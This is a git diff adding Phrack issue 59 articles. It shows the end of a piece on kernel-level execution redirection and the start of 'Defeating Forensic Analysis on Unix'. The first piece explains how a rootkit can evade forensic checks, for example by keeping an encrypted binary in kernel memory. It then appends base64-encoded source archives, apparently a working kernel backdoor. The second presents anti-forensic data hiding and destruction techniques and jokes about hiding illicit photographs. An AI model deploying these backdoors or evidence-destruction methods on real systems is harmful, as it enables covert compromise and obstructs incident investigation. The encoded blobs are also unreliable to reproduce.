+  Note, too, that this technique may be used to execute a binary in before
+and afterwards of the binary requested to be executed. That might be useful
+to modify the system enviroment.
+
+  And finally note that we are not forced to sticking to a distinct runtime
+pattern. We may change at will the pattern triggering a redirection. I am
+really curious what people will do to detect execution redirection achieved
+with this method as it is not sufficient to check for one or two replaced
+pointers. It is even not sufficient to do execution path analysis as the
+path can be different for each execution. And it is not enough to search
+the filesystems for hidden files (which might indicate that, too, execution
+redirection is going on). Why is it not enough? See appendix B. All employed
+methods for forensical analysis of execution redirection defeated in one
+module? We could make the decision from/to where and when (and whoms)
+execution shall be redirected dependant on an arbitrary state or pattern.
+
+  This is another handy entry point for an infector.
+
+
+--[ 4 - Conclusion
+
+  We can take complete control of binary execution. There are many ways to
+redirect execution, some are easier to detect than others. It has to be
+asserted that it is not sufficient to check for one or two replaced pointer
+to get evidence if a system has been backdoored. Even if a system call has
+not been replaced (not even redirected at all) execution redirection can
+happen.
+
+  One might now argue it is possible to search the binary redirected to. It
+has to be physically present on the harddisk. Programs have been developed
+to compare the content of a harddisk to the filesystem content shown in
+user land. Therefore it would be possible to detect even hidden files, as
+there might be, if a kernel backdoor is in use.  That is completely wrong.
+
+  Most obviously we would keep the binary totally in kernel memory. If our
+binary needs to be executed, we write it to disk and execute. When
+finished, we unlink it. Of course, it is also possible to copy the binary
+just "in place" when it is to be executed. Finally, to prevent pattern
+matching in kernel memory, we encrypt the data. A approach to this method
+is shown in appendix B. Under linux we can abuse the proc filesystem for
+this purpose, too.
+
+  As long as forensic tools work on with a closed world assumption it will
+be still possible to evade them. Checking for replaced pointers does not
+help unless you check all, not only those "believed to be" important
+(letting alone that pointer checking cannot prove if a function is
+redirected or not). Developers might better invest their time to develop
+tools checking possible execution paths.  Anomaly detection of kernel
+behaviour is a more reliable forensical analysis method than pattern
+matching.
+
+
+--[ 5 - Reference
+
+[1] Tripwire
+    http://www.tripwire.com
+[2] Aide
+    http://www.cs.tut.fi/~rammer/aide.html
+[3] knark
+    http://www.packetstormsecurity.com/UNIX/penetration/rootkits/
+    knark-0.59.tar.gz
+[4] kernel function hijacking
+    http://www.big.net.au/~silvio/kernel-hijack.txt
+[5] Linux x86 kernel function hooking emulation
+    http://www.phrack.org/show.php?p=58&a=8
+[6] LKM - Loadable Linux Kernel Modules
+    http://www.thehackerschoice.com/download.php?t=p&d=LKM_HACKING.html
+
+
+--[ Appendix A: stories.tgz.uu
+
+<++> ./stories.tgz.uu
+begin-base64 644 stories.tgz
+H4sICI95NT0CA3N0b3JpZXMudGFyAO1ae3PaOhbPv/hT6HJ3OkAJmABhp9xk
+bjaht2zTpANkOt2241FsAZ76tbZJIJ3sZ99zJPmBMaTtNO226zNNbUtHR+eh
+x+8IBaHrmyxo7j0iqWpH7XW78FRbB+0DfKqtToc/Je0BQ6t70Ot0e709tdXq
+dQ/3SHfvO9AiCKlPyN5H0zKps4uP+cHeL0eBjP8r+pFNTYs9Svxbqnoo4p0b
+/3b3IIp/+7DbAv52R23vEbWI/6PT5fmZ9vpk8uKINK9Np2kFysXgTbrECxTl
+9LR0RGa6rpw+Pz/5awwf+5dtsn92qY0GZ8ORYH9f/lslklZ9X4bqi2x1JBqq
+lct//HNwOkFZukWDwNQbLrFc34CHw5aLAJ7u9Y3p8rdbaobMb7iKQi3rWQk6
+Eq2rSulPps9dUjZchzXKiqJbjDrPlJJvk31/SlKcewXtmP/Sw/oPmP8HvYNe
+vP4fqF0x/w+L+f89qFlTSI2cD08HF+PBM3wP52ZAcCsgNl2Ra0Z01zOZQVyf
+GAvPMnUawpfpEOqsyNT17Tp8YMPbuQuNgA3qPOqHdWK7hjmVbR0XCmgAc9yZ
+4RO7wVYgfeWbs3mIHKbOCPTu+cxjjgENry5eXZ4Nnw8HZw1gRv4Jqqe7hmR0
+3SmBf7rr6MwLG1DNCF2Ec+hRp6ijQWwIMbYE+WiOTaGtzwLPdQLzGjQGG9AW
+NEO3FoYJ+l0vuDrEMm2YFgZ3i8sZTIM5IbXQIugzYP9ewLcJBQa16YzV4RlS
+MDIIgAXbwbC5QbPcRQj1QsGU+jcmmlk+GZPhuMzVfTOcvLi8mmDbk4u35M3J
+aDS4mLxtkKvxgAwn5GRC3l5ekcs3F2Q0HL+M/MLDhjLB8+iREPp5Pfep/pFU
+bm9vGx5/b7j+rEqAxYSFkof7xLih4LsAo/aS+Q6zyAtgRC8Mh+R6BQItG4Y+
+aZKQBS40aSrK7waABYcRTXs5GF0MzjUtLoJ4XZ0PlN+FMxn5wzKdxbIJQ2Fh
+scb8eKMmCH3oLLfGotd55badVzoNckvNbK80sJsLqoPJvEFSUwZNYIQ39HJi
+4Onl2WA8/NeA9BRYJ8BrRJ/jcgHkanMIl8X8d70P/Y1aJ679QI5I+f3y+u/v
+l6q6/jedvl8ytdxXlBvXNEiK+Da28DThtkoVWKALf6GHYmoC1RRHc2GaaGzJ
+9ArvuIZ1VeWTgvVZdp+FIAVfcc7zItJoNIDPtCx8k4VN/jSnpPIbiNBtr4Ii
+6iS92Vdh4+WCj4gmvFZJb/ZV2ZHNbN1bVWIt64nT6rFrgRl5QT2QlhjETelv
+EePkionkLHyHcGvvwWumE8KfGcaulO6pVfhKVKuSJ0msWhgsXlElKe+uq5H0
+ndIoY83nqpzSWBX64khQsuGXOn+uP++VL97/I6ylf//9v60exPi/02q3cf/v
+Hhb7f7H/F/t/sf8X+3+0/+NO5miGy5f+G5ba8uui31qN+jde/MEc/JAwwAs1
+n80ChAGzINpPQGK6U5IHEQQ8MMOABKbtwXTpVx8NKMS2PQwUEjeIToXlwmRu
+Yn+L4O8DHeIOt0GHlEb50OFBlb8KOjzo4fvinOT/8vxHnLk9yvHPQ/ivox62
+k/OfDp7/tw+6Bf4r8F+B/35e/JflGL8dn56cn4+R9X8WG4ryhWMGoZHbqz5n
++RW2p1ku+Den7tp0pnYYfAUKZcsQIkIicFgLVoGmU8vSQgoD9x2HnRzd8Y40
+0RGpMWuK74BHLq7OzyV0XAN6lZrLTzeqRKJIHNshbP95jJZLDZRH/RXwZ3v0
+fBuaKyWg1KlTDDdTyDUlJ18KPL8Cr2ZBKEjZP8bQOtTeQKPkk1KCJa/EJwwj
+MLxgfsCsCVgY8okfNYb5zjkMFpg+zFA+Vvj8DFybwWQDZmYFHA6XcE4gzPU0
+HWY+S1SoExUcUEqkpk+4skC4hMse9Zn0B0rBxvJgbM193FMS5nKOGLeiN+7X
+4Oz2lvdxaFCptXwCPT216E7Xc614S9FG8EssjRGJx6EYiNz5ydjUF74Pa+f+
+sRi2aMiaqsAimfePU8X9WMZaMXA/WRtiKC8zXzTtYsQV/hCrHjnsS+D/xvQS
+2SCKg7KtfYqudqn0xJE6fSG2/xwzN4Ly22ZQsg511/0pPFUkCL8k/uc/vT8O
+/H8Q/7dbh/H9j17nEPG/eqgW+L/A/wX+L/D/T4z/MyB/vYL5vuNux/7xSbKg
+mqaBR+nCCjXqz274qfInkoaQdVKmi2W5zrd1cl9XMs3wbFQ0U8ovLl8NjprA
+W54MRq+OuA34xW9qYcLyrBnA/1LYfT/+8dm2qYcKaPJbAJAFzKSZA+OYT25C
+qGH4/dwaK4Jc2QqYCmF+DYeVW6qM/HJ3Og04iut/Tg6VhbY8MPmpEJqf5EBZ
+Z9TSP9ND0mD6Gl8NhJOyAXU1j4bzfk5drebwIIsQrhPWYSTBuEwFzE7MmaDX
+KOXCLGMRMlFY2dSr5scIkoXaNKjIqXo2Xj9elgft/v6x0Oud+gFyiOhLvqJS
+azkFemerp+i2vOKun1u8hHGriqolR6ZcOk1nG0vMM9RlB7AFBVSBwFYppRPD
+OOHQXRs2rcRf+8ciFiI9zBieODBpgGnZfU6qtdydOCQCwISPNgxCV68E5h1z
+p5vRqdbJX89fy9VTxmNT5dTvKuWpC4A9KOfwikAh79oikseIYVxjFINN5jjo
+9S05DlbtyHF4tchx8PWb5DiRTFeKLFKTr8f/0SXcH3H/o9NJ7n/3Wiq//3HQ
+K/B/gf8L/F/c/3gcjP8tkXxevoDlXgguz/T+AOp/GK3m4lKB0BJkKk/Pq190
+s0TCvMwB/K7zdzDG9fu56DY6gJcbPXpU+8iHVyUCbREL7OAzFuJbRZ5BV3mv
+DXa9jHh5T8D4ejLSBqNRJWpbTc7/h+P1mqpSmrmhixNv41IL8FNiQNQgBiGR
+B54weYAdFzxwODPqAowxYIBiCsvBnPnid4CdF2DyfnYQl2Cksbsuwkg7ldL6
+/RYhU3ondo++3CwzoOxJFPv4zFdIBXgMmsQwmCdW5MkR+c/riXY2GZ2cDmQb
+byHCkfIylIMjn8l0Ky+cEWYWY2IXDo5M24IkReUOLCkZBJqMrtl8AzyZyE1u
+7/zqmDLCf9Ea9APOf9XOYSu+/9HB+la7U+C/70N8O8EVCWZ6tJjI5BxqSqU4
+8b6dIySs1Cj+cqSKO4Cf5AHF8unTvnyt0egdE+T1vFhIl8tfpjP8KJVqy/hX
+Ndn/Si6YXD1aJU9JC39svuMTfpnk0aSy2kiYbWYHLCQVWBLVOlnxstX+Pm+K
+oK9yx40jd+QPsoLH06fCrOW7O1wEKDz6G0YUKWNBBRVUUEEFFVRQQQUVVFBB
+BRVUUEE/Ef0XupwxUgBQAAA=
+====
+<-->
+
+
+--[ Appendix B: fluc.c.gz.uu
+
+<++> ./fluc.c.gz.uu
+begin-base64 644 fluc.c.gz.uu
+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
+====
+<-->
+
+EOF
diff --git a/phrack59/6.txt b/phrack59/6.txt
new file mode 100644
index 0000000..cb4358a
--- /dev/null
+++ b/phrack59/6.txt
@@ -0,0 +1,2055 @@
+                           ==Phrack Inc.==
+
+              Volume 0x0b, Issue 0x3b, Phile #0x06 of 0x12
+
+|=--------------=[ Defeating Forensic Analysis on Unix ]=----------------=|
+|=-----------------------------------------------------------------------=|
+|=-------------=[ the grugq <grugq@anti-forensics.com> ]=----------------=|
+|=--------------------[ www.anti-forensics.com ]=------------------------=|
+
+
+--[ Contents
+
+  1 - Introduction
+    1.1 - Generic Unix File Systems
+    1.2 - Forensics
+
+  2 - Anti-Forensics
+
+  3 - Runefs
+    3.1 - Creating hidden space
+    3.2 - Using hidden space
+    3.3 - TCT unclear on ext2fs specifications
+
+  4 - The Defiler's Toolkit
+    4.1 - Necrofile
+      4.1.1 - TCT locates deleted inodes
+      4.1.2 - Necrofile locates and eradicates deleted inodes
+      4.1.3 - TCT unable to locate non-existant data
+    4.2 - Klismafile
+      4.2.1 - fls listing deleted directory entries
+      4.2.2 - Klismafile cleaning deleted directory entries
+      4.2.3 - fls unable to find non-existant data
+
+  5 - Conclusion
+
+  6 - Greets
+
+  7 - References
+
+  8 - Appendix
+    8.1 - The Ext2fs
+    8.2 - runefs.tar.gz (uuencoded)
+    8.3 - tdt.tar.gz (uuencoded)
+
+
+--[ 1 - Introduction
+
+   Anti-forensics: the removal, or hiding, of evidence in an attempt to
+         mitigate the effectiveness of a forensics investigation.
+
+    Digital forensic analysis is rapidly becoming an integral part of
+incident response, capitalising on a steady increase in the number of
+trained forensic investigators and forensic toolkits available. Strangly,
+despite the increased interest in, and focus on, forensics within the
+information security industry, there is surprisingly little discussion of
+anti-forensics. In an attempt to remedy the lack of coverage in the
+literature, this article presents anti-forensic strategies to defeat
+digital forensic analysis on Unix file systems. Included are example
+implementations of these strategies targeting the most common Linux file
+system -- ext2fs.
+
+    To facilitate a useful discussion of anti-forensic strategies it is
+important that the reader possess certain background information. In
+particular, the understanding of anti-forensic file system sanitization
+requires the comprehension of basic Unix file system organisation. And, of
+course, the understanding of any anti-forensic theory demands at least a
+rudimentary grasp of digital forensic methodology and practise. This
+article provides a limited introduction to both Unix file systems and
+digital forensics. Space constraints, however, limit the amount of coverage
+available to these topics, and the interested reader is directed to the
+references, which discuss them in greater depth.
+
+----[ 1.1 - Generic Unix File Systems
+
+    This section will describe basic Unix file system theory (not focussing
+on any specific implementation), discussing the meta-data structures used
+to organise the file system internally. Files within the Unix OS are
+continuous streams of bytes of arbitrary length and are the main
+abstraction used for I/O. This article will focus on files in the more
+general sense of data stored on disk and organised by a file system.
+
+    The data on a disk compriising a Unix file systems is commonly divided
+into two groups, information about the files and the data within the files.
+The organizational and accounting information (normally only visible only
+to the kernel) is called "meta-data", and includes the super-block, inodes
+and directory files. The content stored in the files is simply called
+"data". 
+
+    To create the abstraction of a file the kernel has to transparently
+translate data stored across one or more sectors on a hard disk into a
+seemless stream of bytes. The file system is used to keep track of which,
+and in what order, these sectors should be group together into a file.
+Additionally, these sector groups need to be kept seperate, and
+individually distinguishable to the operating system. For this reason there
+are several types of meta-data, each responsible for accomplishing one of
+these various tasks.
+
+    The content of a file is stored on data blocks which are logical
+clusters of hard disk sectors. The higher the number of sectors per data
+block the faster the speed of the disk I/O, improving the file system's
+performance. At the same time, the larger the data blocks the larger the
+disk space wasted for files which don't end on block boundaries. Modern
+file systems typically compromise with block size of 4096 or 8192 bytes,
+and combat the disk wastage with "fragments" (something not dealt with
+here). The portion of the disk dedicated to the data blocks is organised as
+an array, and blocks are referred to by their offsets within this array.
+The state of a given block, i.e. free vs. allocated, is stored in a bitmap
+called the "block bitmap".  
+
+    Data blocks are clustered and organised into files by inodes. Inodes
+are the meta-data structure which represent the user visible files; one for
+each unique file. Each inode contains an array of block pointers (that is,
+indexes into the data block array) and various other information about the
+file. This additional information about the file includes: the UID; GID;
+size; permissions; modification/access/creation (MAC) times, and some other
+data. The limited amount of space available to inodes means the the block
+pointer array can only contain a small number of pointers. To allow file
+sizes to be of substantial length, inodes employ "indirect blocks". An
+indirect block acts as an extension to the block array, storing additional
+pointers. Doubly and trebly indirect blocks contain block pointers to
+further indirect blocks, and doubly indirect blocks respectively. Inodes
+are stored in an array called the inode table, and are referred to by their
+0-based indexes within this table. The state of an inode, i.e. free vs.
+allocated, is stored in a bitmap called, imaginitively, the "inode bitmap".
+
+    Files, that is, inodes, are associated with file names by special
+structures called directory entries stored within directory files. These
+structures are stored contigously inside the directory file. Directory
+entries have a basic structure of:
+
+struct dirent {
+    int   inode;
+    short rec_size;
+    short name_len;
+    char  file_name[NAME_LEN];
+};
+
+    The 'inode' element of the dirent contains the inode number which is
+linked with the file name, stored in 'file_name'. To save space, the actual
+length of the file name is recorded in 'name_len' and the remaining space
+in the file_name array is used by the next directory entry structure. The
+size of a dirent is usually rounded up to the closest power of two, and
+this size is stored in 'rec_size'. When a file name/inode link is removed,
+the inode value is set to 0 and the rec_size of the preceding dirent is
+extended to encompass the deleted dirent. This has the effect of storing
+the names of deleted files inside directory files.
+
+    Everytime an file name is linked with a file name, and internal counter
+within the inode is incremented. Likewise, everytime a link is removed,
+this counter is decremented. When this counter reaches 0, there are no
+references to the inode from within the directory structure; the file is
+deleted. Files which have been deleted can safely have their resources, the
+data blocks and the inode itself, freed. This is accomplished by marking
+the appropriate bitmaps.
+
+    Directories files themselves are logically organised as a tree starting
+from a root directory.  This root directory file is associated with a known
+inode (inode 2) so that the kernel can locate it, and mount the file
+system. 
+
+    To mount a file system the kernel needs to know the size and locations
+of the meta-data. The first piece of meta-data, the super block, is stored
+at a known location. The super-block  contains information such as the
+number of inodes and blocks, the size of a block, and a great deal of
+additional information. Based on the data within the super block, the
+kernel is able to calculate the locations and sizes of the inode table and
+the data portion of the disk.
+
+    For performance reasons, no modern file system actually has just one
+inode table and one block array. Rather inodes and blocks are clustered
+together in groups spread out across the disk. These groups usually contain
+private bitmaps for their inodes and blocks, as well as copies of the
+superblock to aid recovery in case of catastrophic data loss.
+
+    Thus concludes the whirlwind tour of a generic unix file system. A
+specific implementation is described in Appendix A: The Second Extended
+File System. The next section will provide an introduction to digital file
+system forensics.
+
+
+----[ 1.2 - Forensics
+
+    Digital forensic analysis on a file system is conducted to gather
+evidence for some purpose. As stated previously, this purpose is irrelevant
+to this discussion because anti-forensics theory shouldn't rely on the
+intended use of the evidence; it should focus on preventing the evidence
+from being gathered. That being said, ignorance as to the reasons behind an
+analysis provides no benefit, so we will examine the two primary motivators
+behind an investigation.
+
+    The purpose of an incident response analysis of a file system is either
+casual, or legal. These terms are not the standard means to describing
+motives and because there are significant differences between the two, some
+explanation is in order.
+
+    Legal investigations are to aid a criminal prosecution. The strict
+requirements on evidence to be submitted to a court of law make subversion
+of a legal forensic investigations fairly easy. For instance, merely
+overwriting the file system with random data is sufficient to demonstrate
+that none of the data gathered is reliable enough for submission as
+evidence.
+
+    Casual investigations do not have as their goal the criminal
+prosecution of an individual. The investigation is executed because of
+interest on the part of the forensic analyst, and so the techniques, tools
+and methodology used are more liberally inclined. Subverting a casual
+forensic analysis requires more effort and skill because there are no
+strict third party requirements regarding the quality or quantity of
+evidence.
+
+    Regardless of the intent of the forensics investigation, the steps
+followed are essentially the same:
+
+        * the file system needs to be captured
+	* the information contained on it gathered
+	* this data parsed into evidence 
+	* this evidence examined.
+
+    This evidence is both file content (data), and information about the
+file(s) (meta-data). Based on the evidence retrieved from the file system
+the investigator will attempt to:
+
+        * gather information about the individual(s) involved [who]
+        * determine the exact nature of events that transpired [what] 
+        * construct a timeline of events [when]
+        * discover what tools or exploits where used [how]
+
+    As an example to how the forensics process works, the example of the
+recovery of a deleted file will be presented.
+
+    A file is deleted on a Unix file system by decrementing the inode's
+internal link count to 0. This is accomplished by removing all directory
+entry file name inode pairs. When the inode is deleted, the kernel will
+mark is resources as available for use by other files -- and that is all.
+The inode will still contain all of the data about the file which it
+referenced, and the data blocks it points to will still contain file
+content. This remains the case until they have been reallocated, and
+reused; overwriting this residual data.
+
+    Given this dismal state of affairs, recovering a deleted file is
+trivial for the forensic analyst. Simply searching for inodes which have
+some data (i.e. are not virgin inodes), but have a link count of 0 reveals
+all deleted inodes. The block pointers can then be followed up and the file
+contents (hopefully) recovered. Even without the file content, a forensic
+analyst can learn much about what happened on a file system with only the
+meta-data present in the directory entries and inodes. This meta-data is
+not accessable through the kernel system call interface and thus is not
+alterable by normal system tools (this is not strictly true, but is
+accurate enough from a forensics POV). 
+
+    Unfortunately, accomplishing this is extremely difficult, if not
+impossible, when the forensic analyst is faced with a hostile
+anti-forensics agent. The digital forensics industry has had an easy time
+of late due to the near absense of anti-forensics information and tools,
+but that is (obviously) about to change. 
+
+
+--[ 2 - Anti-Forensics
+
+    In the previous section forensic analysis was outlined, and means of
+subverting the forensic process were hinted at, this section will expand on
+anti-forensic theory. Anti-forensics is the attempt to mitigate the
+quantity and quality of information that an investigator can examine. At
+each steps of the analysis, the forensics process is vulnerable to attack
+and subversion. This article focuses primarily on subverting the data
+gathering phase of a digital forensics investigation, with two mechanisms
+being detailed here: the first is data destruction, and the second data
+hiding. Some mention will also be given to exploiting vulnerabilities
+throughout the analytic process.
+
+    The digital forensics process is extremely vulnerable to subversion
+when raw data (e.g. a bit copy of a file system) is converted into evidence
+(e.g. emails). This conversion process is vulnerable at almost every step,
+usually because of an abstraction that is performed on the data.  When an
+abstraction layer is encountered, details are lost, and details *are* data.
+Abstractions remove data, and this creates gaps in the evidence which can
+be exploit. But abstractions are not the only source of error during a
+forensic analysis, the tools used are themselves frequently flawed and
+imperfect. Bugs in the implementations of forensic tools provide even
+greater oppurtunities for exploitation by anti-forensic agents.
+
+    There is little that a remote anti-forensics agent can do to prevent
+the file system from being captured, and so focus has been given to
+exploiting the next phase of a forensic investigation -- preventing the
+evidence from being gathered off the file system. Halting data aquisition
+can be accomplished by either of two primary mechanisms: data destruction
+and data hiding. Of the two methods, data destruction is the most reliable,
+leaving nothing behind for the investigator to analyse. Data destruction
+provides a means of securely removing all trace of the existance of
+evidence, effectively covering tracks.
+
+    Data hiding, on the other hand, is useful only so long as the analyst
+doesn't know where to look. Long term integrity of the data storage area
+cannot be garaunteed. For this reason, data hiding should be used in
+combination with attacks against the parsing phase (e.g. proprietary file
+formats), and against the examination phase (e.g. encryption). Data hiding
+is most useful in the case of essential data which must be stored for some
+length of time (e.g. photographs of young women in artistic poses).
+
+    The two toolkits which accompany this article provide demonstration
+implementations of both data destruction, and data hiding methodologies.
+The toolkits will be used to provide examples when examining data
+destruction and hiding in greater detail below. The first anti-forensics
+methodology that will be examined in depth is data hiding. 
+
+--[ 3 - Runefs
+
+    The most common toolkit for Unix forensic file system analysis is "The
+Coronor's Toolkit"[1] (TCT) developed by Dan Farmer and Wietse Venema.
+Despite being relied on for years as the mainstay of the Unix digital
